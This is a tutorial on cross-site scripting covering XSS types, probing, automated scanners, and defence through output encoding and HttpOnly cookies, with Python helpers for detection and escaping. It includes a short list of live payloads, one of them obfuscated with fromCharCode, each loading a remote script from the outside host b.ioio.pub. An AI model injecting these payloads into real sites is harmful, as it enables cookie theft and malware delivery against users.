XSS (cross-site scripting): an attacker embeds a piece of malicious code in a web page; when a user browses that page the embedded code is executed in the user's browser, which is how the user ends up being attacked.
The focus is on script: JavaScript, and ActionScript in the case of Flash content.
XSS attacks are generally classified into three categories: reflected XSS, stored XSS and DOM XSS (plus the less common Flash XSS and mutation XSS, mXSS).
The emphasis in these notes is on stored XSS.
Harm:
Stealing an administrator's cookie (and with it the session)
Spear-phishing attacks
Planting malware on the page (drive-by download / watering hole)
and so on.
(1) Reflected XSS: an attacker-controlled parameter is in the URL; the server echoes it in the response and the browser parses and executes it. The victim has to be lured into opening the crafted URL, so it is usually rated as less harmful, though the impact once triggered is the same.
(2) Stored XSS: the attacker submits the payload, the server accepts and stores it, and every user who later views that content gets XSS'd without having to click anything.
(3) DOM XSS: the DOM is the object model for HTML, XHTML and XML documents; through the DOM, programs and scripts can dynamically read and update a document's content, structure and style. DOM XSS does not need the server to reflect anything in its response: it is triggered when client-side script writes attacker-controlled data (for example from location.hash) into the DOM, so it can be considered entirely a client-side issue.
4. Flash XSS
Exploits a flaw in a Flash (SWF) file embedded in the page to execute JavaScript; it is generally a reflected XSS.
Detection of XSS
XSS detection is generally done in two ways: manual testing and automated scanning with software.
Manual testing: accurate results, but time-consuming and laborious on a large site.
Automated scanning: convenient and labour-saving, but it produces false positives, and some hidden XSS cannot be detected this way.
The most important thing when looking for XSS is to work out where there is input and where that input data is output.
Storage-type XSS Steps
1. Manual detection
When the output location can be determined:
• Enter sensitive characters such as < > " ' ( ) and, after submitting, view the HTML source to see whether these characters were escaped.
• The program may already filter these characters on output, so it is more convenient to submit the string AAAAAA<>"&'() and then search the source for AAAAAA.
When the output location cannot be determined: the source of many web applications is not public, so during testing you cannot tell where a value is output. For example, some guestbooks only display a message after an administrator has approved it, so you cannot know what state the data is in on the back-end admin page, e.g.
inside a tag: <div>XSS Test</div>
inside an attribute: <input type="text" name="content" value="XSS Test" />
In this case the usual test input is "/>XSS Test, which closes an attribute value and its tag if either is where the data lands, and is easy to search for on the page that eventually displays it.
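As an added example (not from the original post), a small Python helper that automates the first step above: it looks for the AAAAAA marker in a captured response, classifies the output context (text between tags, quoted or unquoted attribute value, script block) and reports which of the probe characters came back unescaped. The sample responses are constructed for the example; the heuristics for locating the context are deliberately simple and assume reasonably well-formed HTML.

```python
import re

# Constructed probe: an easy-to-search marker followed by the characters whose
# escaping decides whether the reflection can be turned into an injection.
MARKER = "AAAAAA"
SPECIALS = "<>\"&'()"
PROBE = MARKER + SPECIALS

# Entity spellings an output filter may have produced for each probe character.
ENTITIES = {
    "<": ("&lt;", "&#60;", "&#x3c;"),
    ">": ("&gt;", "&#62;", "&#x3e;"),
    '"': ("&quot;", "&#34;", "&#x22;"),
    "&": ("&amp;", "&#38;", "&#x26;"),
    "'": ("&#039;", "&#39;", "&apos;", "&#x27;"),
    "(": ("&#40;", "&#x28;"),
    ")": ("&#41;", "&#x29;"),
}


def attribute_quote(tag_prefix):
    """tag_prefix is the tag text from its '<' up to the reflection point.
    Returns '"' or "'" when the reflection sits in a quoted attribute value,
    '' when it sits in an unquoted value, None when it is not in a value."""
    last = None
    for last in re.finditer(r"=\s*([\"']?)", tag_prefix):
        pass
    if last is None:
        return None
    quote, rest = last.group(1), tag_prefix[last.end():]
    if quote:
        return quote if quote not in rest else None       # is the quote still open?
    return "" if not re.search(r"\s", rest) else None     # unquoted value ends at whitespace


def output_context(body, pos):
    """Classify where offset `pos` of the HTML response lands."""
    lower = body.lower()
    open_script = lower.rfind("<script", 0, pos)
    if open_script != -1 and lower.find("</script", open_script, pos) == -1:
        return "script"
    last_open, last_close = body.rfind("<", 0, pos), body.rfind(">", 0, pos)
    if last_open <= last_close:
        return "text"                                      # between tags
    quote = attribute_quote(body[last_open:pos])
    if quote is None:
        return "tag"                                       # e.g. in an attribute name position
    return {"": "attribute(unquoted)", '"': 'attribute(")', "'": "attribute(')"}[quote]


def surviving_specials(tail):
    """Walk the reflected copy of SPECIALS in order and return the characters
    that came back literally. Entity forms are checked first because '&amp;'
    also starts with a literal '&'. A character that is neither literal nor an
    entity was stripped by the filter, so scanning simply continues in place."""
    survived, i = "", 0
    for ch in SPECIALS:
        for ent in ENTITIES[ch]:
            if tail.lower().startswith(ent, i):
                i += len(ent)
                break
        else:
            if tail.startswith(ch, i):
                survived += ch
                i += 1
    return survived


def analyze_reflection(body):
    """One finding per reflection of the marker in `body`: the output context,
    which special characters survived, and whether that combination lets the
    input break out of its context."""
    findings = []
    for m in re.finditer(MARKER, body):
        ctx = output_context(body, m.start())
        alive = surviving_specials(body[m.end(): m.end() + 8 * len(SPECIALS)])
        if ctx == "text":
            breakout = "<" in alive                        # can open a new tag
        elif ctx.startswith("attribute("):
            q = ctx[len("attribute("):-1]
            breakout = q == "unquoted" or q in alive       # can end the attribute value
        elif ctx == "script":
            breakout = any(c in alive for c in "<'\"")     # can end the string or the script
        else:
            breakout = False
        findings.append({"offset": m.start(), "context": ctx,
                         "unescaped": alive, "breakout": breakout})
    return findings


# Constructed responses standing in for pages that echoed the probe.
SAMPLE_RESPONSES = {
    "unfiltered text": '<div>AAAAAA<>"&\'()</div>',
    "escaped, double-quoted attr": '<input type="text" name="content" value="AAAAAA&lt;&gt;&quot;&amp;\'()" />',
    "escaped w/o single quote, single-quoted attr": "<input value='AAAAAA&lt;&gt;&quot;&amp;'()'>",
    "unquoted attr": "<a href=AAAAAA&lt;&gt;&quot;&amp;&#039;()>x</a>",
}

if __name__ == "__main__":
    for name, html in SAMPLE_RESPONSES.items():
        for f in analyze_reflection(html):
            print(f"{name}: context={f['context']} unescaped={f['unescaped']!r} breakout={f['breakout']}")
```

The third sample is the case the defence section below warns about: every character except the single quote was entity-encoded, but because the value sits in a single-quoted attribute that one surviving character is enough to end the value and add an event-handler attribute.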
2. Automated detection of XSS
Software such as AppScan, AWVS and Burp Suite can detect XSS effectively. They also detect other vulnerabilities, but they are less efficient at XSS than dedicated XSS detection tools.
Dedicated XSS scanners include the well-known XSSer and XSSF, as well as web services that specialise in scanning for DOM XSS (www.domxssscanner.com).
Manual and automated testing generally have to be combined, because some XSS cannot be found by software: for example, posting a message may require a CAPTCHA, which the tools cannot get past.
An XSS payload generally has to close the tag or attribute it lands in, just as SQL injection closes the surrounding quote. Common payloads (all loading the same remote probe script) are as follows:
• <script src='http://b.ioio.pub/xss/probe.js'></script>
• <img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js';">
• <svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'>
• <svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,…))>
The character codes in the last payload decode to s=createElement('script');body.appendChild(s);s.src='ht… (the remainder of the list is garbled in the source); this is the same loader as the two payloads before it, encoded so that a filter looking for the literal strings script or src= does not match. The bare createElement and body in the event handlers work because inline handler attributes run with document on their scope chain, which keeps the payload short.
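An added example (not part of the original post) from the detection side: the payload shapes above are recognisable in web server logs once the query string is percent-decoded and any String.fromCharCode(...) list is turned back into text. The log lines below are constructed, and the indicator regexes are illustrative rather than a complete XSS signature set; the third line reuses the recoverable character codes from the fourth payload above, which decode to the start of the same loader.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). The last two carry payloads
# in the shapes listed above, percent-encoded the way a browser sends them.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /guestbook.php?msg=hello+world HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /guestbook.php?msg=%3Csvg+onload%3Ds%3DcreateElement(%27script%27)%3Bbody.appendChild(s)%3Bs.src%3D%27//b.ioio.pub/xss/probe.js%27%3E HTTP/1.1" 200 734',
    '10.0.0.9 - - [10/Oct/2023:13:56:40 +0000] "GET /guestbook.php?msg=%3Csvg+onload%3Deval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59))%3E HTTP/1.1" 200 734',
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+([^\s"]+)')
# Tags that commonly carry an executable handler or src, and the handlers seen in payloads.
TAG_RE = re.compile(r"<\s*(?:script|svg|img|iframe|body|math|object|embed|details)\b", re.I)
HANDLER_RE = re.compile(
    r"\bon(?:load|error|focus|blur|click|mouseover|mouseenter|toggle|input|change|animationstart|pointerover)\s*=",
    re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
# Either way of pulling in a remote script: createElement('script') or a protocol-relative/absolute src.
LOADER_RE = re.compile(r"createElement\s*\(\s*['\"]script|\.src\s*=\s*['\"]?(?:https?:)?//", re.I)


def decode_from_char_code(arg_text):
    """Turn the decimal list inside String.fromCharCode(...) back into text."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", arg_text))


def inspect_request(log_line, max_decodes=2):
    """Pull the query string out of one log line, percent-decode it (twice, to
    catch double encoding; this can also over-decode a legitimate literal %),
    decode any fromCharCode blobs, and return the XSS indicators found.
    Returns None for lines without a query string."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return None
    path, query = m.group(1).split("?", 1)
    decoded = query
    for _ in range(max_decodes):
        decoded = unquote_plus(decoded)
    blobs = [decode_from_char_code(fc.group(1)) for fc in FROMCHARCODE_RE.finditer(decoded)]
    visible = decoded + "\n" + "\n".join(blobs)      # scan the decoded blobs as well
    indicators = []
    if TAG_RE.search(visible):
        indicators.append("html_tag")
    if HANDLER_RE.search(visible):
        indicators.append("event_handler")
    if blobs:
        indicators.append("fromCharCode")
    if LOADER_RE.search(visible):
        indicators.append("remote_script_load")
    return {"path": path, "query": decoded, "decoded_fromcharcode": blobs,
            "indicators": indicators, "suspicious": bool(indicators)}


def scan_log(lines):
    """Return only the suspicious requests, in log order."""
    hits = []
    for line in lines:
        r = inspect_request(line)
        if r and r["suspicious"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["path"], hit["indicators"], hit["decoded_fromcharcode"])
```

For stored XSS the request that planted the payload may be long gone by the time the first victim is hit, so the same check is worth running over the stored content itself, not only over live traffic.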
Defending against XSS
1. Filter input and encode output (emphasis)
Convert the characters that have special meaning in HTML into HTML entities with htmlspecialchars() or htmlentities(). Pass ENT_QUOTES explicitly so that single quotes are converted too (before PHP 8.1 the default only converts double quotes), and always write the value into a quoted attribute or into tag text:
<?php
$html = $_GET['x'] ?? '';
if ($html) {
    echo htmlspecialchars($html, ENT_QUOTES, 'UTF-8');
}
?>
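An added example (in Python, not the page's PHP) of why the flags passed to htmlspecialchars() matter: before PHP 8.1 the default flag set is ENT_COMPAT, which converts double quotes but leaves single quotes alone, so a value written into a single-quoted attribute can still break out; ENT_QUOTES (part of the default since PHP 8.1) converts both. The htmlspecialchars function below is a constructed re-implementation of the PHP behaviour for the three quote flags, the guestbook templates and payloads are hypothetical, and the standard-library html.parser shows what a browser would make of the result.

```python
from html.parser import HTMLParser


def htmlspecialchars(s, flags="ENT_QUOTES"):
    """Constructed stand-in for PHP's htmlspecialchars() covering the three
    quote flags. Order matters: '&' must be converted before the others."""
    s = s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    if flags in ("ENT_COMPAT", "ENT_QUOTES"):   # ENT_NOQUOTES leaves both quotes alone
        s = s.replace('"', "&quot;")
    if flags == "ENT_QUOTES":
        s = s.replace("'", "&#039;")
    return s


# Hypothetical guestbook templates: the vulnerable one concatenates raw input,
# the others encode for the context they write into.
def render_comment_vulnerable(comment):
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment):
    return f'<div class="comment">{htmlspecialchars(comment)}</div>'


def render_edit_field(value, flags="ENT_QUOTES"):
    # Single-quoted attribute on purpose: this is exactly where ENT_COMPAT falls short.
    return f"<input type='text' name='content' value='{htmlspecialchars(value, flags)}'>"


class _TagCollector(HTMLParser):
    """Records every start tag and its attribute names, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))

    handle_startendtag = handle_starttag


def parsed_tags(html):
    """Return [(tag_name, [attribute names]), ...] for the rendered fragment."""
    p = _TagCollector()
    p.feed(html)
    p.close()
    return p.tags


# Constructed payloads for the two contexts.
TEXT_PAYLOAD = "<img src=x onerror=alert(document.cookie)>"
ATTR_PAYLOAD = "' onfocus=alert(1) autofocus='"

if __name__ == "__main__":
    print(parsed_tags(render_comment_vulnerable(TEXT_PAYLOAD)))        # div plus an img with onerror
    print(parsed_tags(render_comment_safe(TEXT_PAYLOAD)))              # div only
    print(parsed_tags(render_edit_field(ATTR_PAYLOAD, "ENT_COMPAT")))  # onfocus/autofocus become real attributes
    print(parsed_tags(render_edit_field(ATTR_PAYLOAD, "ENT_QUOTES")))  # only type/name/value
```

Encoding is context-specific: these entities are right for tag text and quoted attribute values, but a value placed inside a script block, a URL, or a CSS property needs the escaping rules of that context instead.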
2. HttpOnly
HttpOnly does not prevent XSS. It addresses the cookie-theft step that usually follows an XSS: a cookie set with the HttpOnly attribute (Set-Cookie: session=...; HttpOnly) is not readable from document.cookie, so the injected script cannot simply send the session cookie to the attacker. It does not stop the script from performing actions in the victim's browser with that session, so it is a mitigation of session hijacking, not a fix for the XSS itself.
Web Security XSS